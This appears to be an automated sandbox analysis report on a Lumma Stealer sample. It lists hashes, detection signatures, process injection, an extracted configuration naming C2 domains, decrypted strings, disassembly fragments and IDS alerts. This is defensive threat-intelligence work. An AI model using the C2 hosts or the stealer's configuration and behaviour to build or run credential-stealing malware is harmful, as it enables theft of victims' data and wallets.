Windows Analysis Report
a7HdB2dU5P.exe

Overview

General Information

Sample name: a7HdB2dU5P.exe (renamed because original name is a hash value)
Original sample name: ec5818decca5d6703e23c9db8a772997.exe
Analysis ID: 1519281
MD5: ec5818decca5d6703e23c9db8a772997
SHA1: daeca7f333cedb461891a3fa4be6a857df452b59
SHA256: 2da667c881a6b5f4b773c932bcbb6825fda5a85a38bfb51e06921cb88c353f3b
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • a7HdB2dU5P.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\a7HdB2dU5P.exe" MD5: EC5818DECCA5D6703E23C9DB8A772997)
    • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["reinforcenh.shop", "offensivedzvju.shop", "fragnantbui.shop", "lootebarrkeyn.shop", "stogeneratmns.shop", "ghostreedmnu.shop", "drawzhotdog.shop", "vozmeatillu.shop", "gutterydhowi.shop"], "Build id": "FATE99--"}
Source: decrypted.memstr
Rule: JoeSecurity_LummaCStealer_2
Description: Yara detected LummaC Stealer
Author: Joe Security
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-09-26T09:52:07.786343+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58440 | 104.21.4.136 | 443 | TCP
    2024-09-26T09:52:08.769507+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58441 | 188.114.97.3 | 443 | TCP
    2024-09-26T09:52:09.681716+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58442 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:10.618108+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58443 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:11.567762+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58444 | 104.21.58.182 | 443 | TCP
    2024-09-26T09:52:12.512577+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58445 | 188.114.97.3 | 443 | TCP
    2024-09-26T09:52:13.467807+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58446 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:14.417603+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58447 | 104.21.77.130 | 443 | TCP
    2024-09-26T09:52:16.841999+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 58449 | 172.67.189.2 | 443 | TCP
    2024-09-26T09:52:07.786343+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58440 | 104.21.4.136 | 443 | TCP
    2024-09-26T09:52:08.769507+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58441 | 188.114.97.3 | 443 | TCP
    2024-09-26T09:52:09.681716+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58442 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:10.618108+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58443 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:11.567762+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58444 | 104.21.58.182 | 443 | TCP
    2024-09-26T09:52:12.512577+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58445 | 188.114.97.3 | 443 | TCP
    2024-09-26T09:52:13.467807+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58446 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:14.417603+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58447 | 104.21.77.130 | 443 | TCP
    2024-09-26T09:52:16.841999+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 58449 | 172.67.189.2 | 443 | TCP
    2024-09-26T09:52:11.097484+0200 | 2056157 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58444 | 104.21.58.182 | 443 | TCP
    2024-09-26T09:52:12.055505+0200 | 2056155 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58445 | 188.114.97.3 | 443 | TCP
    2024-09-26T09:52:08.270066+0200 | 2056163 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58441 | 188.114.97.3 | 443 | TCP
    2024-09-26T09:52:07.234560+0200 | 2056165 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58440 | 104.21.4.136 | 443 | TCP
    2024-09-26T09:52:09.259590+0200 | 2056161 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58442 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:13.943312+0200 | 2056151 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58447 | 104.21.77.130 | 443 | TCP
    2024-09-26T09:52:12.996046+0200 | 2056153 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58446 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:10.172268+0200 | 2056159 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58443 | 188.114.96.3 | 443 | TCP
    2024-09-26T09:52:10.620207+0200 | 2056156 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 64598 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:11.569455+0200 | 2056154 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53726 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:07.792672+0200 | 2056162 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 52810 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:06.724512+0200 | 2056164 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60602 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:06.643740+0200 | 2056048 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 63148 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:08.773382+0200 | 2056160 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60842 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:13.469353+0200 | 2056150 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 64447 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:12.513950+0200 | 2056152 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53338 | 1.1.1.1 | 53 | UDP
    2024-09-26T09:52:09.685196+0200 | 2056158 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 55892 | 1.1.1.1 | 53 | UDP

    AV Detection

    Source: https://drawzhotdog.shop/api | Avira URL Cloud: Label: malware
    Source: https://gutterydhowi.shop/api | Avira URL Cloud: Label: malware
    Source: stogeneratmns.shop | Avira URL Cloud: Label: malware
    Source: https://performenj.shop/vo | Avira URL Cloud: Label: malware
    Source: https://offensivedzvju.shop/ | Avira URL Cloud: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
    Source: lootebarrkeyn.shop | Avira URL Cloud: Label: malware
    Source: reinforcenh.shop | Avira URL Cloud: Label: malware
    Source: https://performenj.shop/apiG | Avira URL Cloud: Label: malware
    Source: https://drawzhotdog.shop/ | Avira URL Cloud: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
    Source: https://reinforcenh.shop/api2 | Avira URL Cloud: Label: malware
    Source: ghostreedmnu.shop | Avira URL Cloud: Label: malware
    Source: https://reinforcenh.shop/api | Avira URL Cloud: Label: malware
    Source: https://reinforcenh.shop/ | Avira URL Cloud: Label: malware
    Source: https://performenj.shop/ | Avira URL Cloud: Label: malware
    Source: https://vozmeatillu.shop/api | Avira URL Cloud: Label: malware
    Source: https://stogeneratmns.shop/api | Avira URL Cloud: Label: malware
    Source: https://vozmeatillu.shop/Y | Avira URL Cloud: Label: malware
    Source: gutterydhowi.shop | Avira URL Cloud: Label: malware
    Source: fragnantbui.shop | Avira URL Cloud: Label: malware
    Source: https://ghostreedmnu.shop/api | Avira URL Cloud: Label: malware
    Source: https://fragnantbui.shop/api | Avira URL Cloud: Label: malware
    Source: https://stogeneratmns.shop/apiD | Avira URL Cloud: Label: malware
    Source: https://offensivedzvju.shop/api | Avira URL Cloud: Label: malware
    Source: https://performenj.shop/G | Avira URL Cloud: Label: malware
    Source: offensivedzvju.shop | Avira URL Cloud: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badges | URL Reputation: Label: malware
    Source: https://performenj.shop/api | Avira URL Cloud: Label: malware
    Source: drawzhotdog.shop | Avira URL Cloud: Label: malware
    Source: vozmeatillu.shop | Avira URL Cloud: Label: malware
    Source: 2.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["reinforcenh.shop", "offensivedzvju.shop", "fragnantbui.shop", "lootebarrkeyn.shop", "stogeneratmns.shop", "ghostreedmnu.shop", "drawzhotdog.shop", "vozmeatillu.shop", "gutterydhowi.shop"], "Build id": "FATE99--"}
    Source: a7HdB2dU5P.exe | ReversingLabs: Detection: 47%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: reinforcenh.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: stogeneratmns.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: fragnantbui.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: drawzhotdog.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: vozmeatillu.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: offensivedzvju.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: ghostreedmnu.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: gutterydhowi.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: lootebarrkeyn.shop
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: TeslaBrowser/5.5
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: - Screen Resoluton:
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: - Physical Installed Memory:
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: Workgroup: -
    Source: 2.2.RegAsm.exe.400000.0.unpack | String decryptor: FATE99--
    Source: a7HdB2dU5P.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:58440 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58441 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58442 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58443 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.4:58444 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58445 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58446 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.4:58447 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:58448 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.189.2:443 -> 192.168.2.4:58449 version: TLS 1.2
    Source: a7HdB2dU5P.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp eax | 2_2_00447600
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0044A7E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esi+1Ch] | 2_2_0040FEBC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then xor eax, eax | 2_2_0040EFFC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp+00000120h] | 2_2_0040EFFC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push ebx | 2_2_00415078
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+34h] | 2_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh | 2_2_004450E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edi, byte ptr [eax+esi] | 2_2_00407120
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042A274
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [edx], ax | 2_2_0042A274
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_0040D2C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042A2F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [edx], ax | 2_2_0042A2F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 2_2_00442280
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [edx], ax | 2_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_00431370
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, eax | 2_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebp, eax | 2_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh | 2_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh | 2_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh | 2_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_00424490
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 2_2_004204A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], dx | 2_2_004204A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, esi | 2_2_0042D56C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_0043B510
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, esi | 2_2_0042D58E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_0042F5B7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esi] | 2_2_004146B5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [ecx+eax] | 2_2_0040F7E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edx], cl | 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [esp], 00000000h | 2_2_0041A880
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp al, 2Eh | 2_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then xor eax, eax | 2_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh | 2_2_00444970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh | 2_2_004489F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_00434A2F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh | 2_2_00445AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esi] | 2_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, ecx | 2_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [edi], 00000000h | 2_2_00413AE6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp+0Ch] | 2_2_0042BB00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp edx | 2_2_00427B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00430BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx ecx, word ptr [edi+eax] | 2_2_00448BE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h | 2_2_0044AC00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esi+edi] | 2_2_00404C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 2_2_00426CA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then add edi, 02h | 2_2_0041DD64
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebx] | 2_2_0041DD64
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ebx] | 2_2_00405D20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_00434DF6
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp+0Ch] | 2_2_00445D80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h | 2_2_0044AD90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_00449E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp byte ptr [ebx], 00000000h | 2_2_00414E26
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then xor eax, eax | 2_2_00414E26
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 2_2_00447EDE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 2_2_0044AF10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah | 2_2_0044AF10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00426F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 2_2_0041CFF0

    Networking

    Source: Network traffic | Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:52810 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.4:60842 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.4:53726 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056048 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lootebarrkeyn .shop) : 192.168.2.4:63148 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.4:60602 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.4:58445 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.4:58444 -> 104.21.58.182:443
    Source: Network traffic | Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.4:58446 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:58441 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.4:64598 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.4:53338 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.4:64447 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.4:58440 -> 104.21.4.136:443
    Source: Network traffic | Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.4:58442 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.4:55892 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.4:58443 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.4:58447 -> 104.21.77.130:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58449 -> 172.67.189.2:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58441 -> 188.114.97.3:443
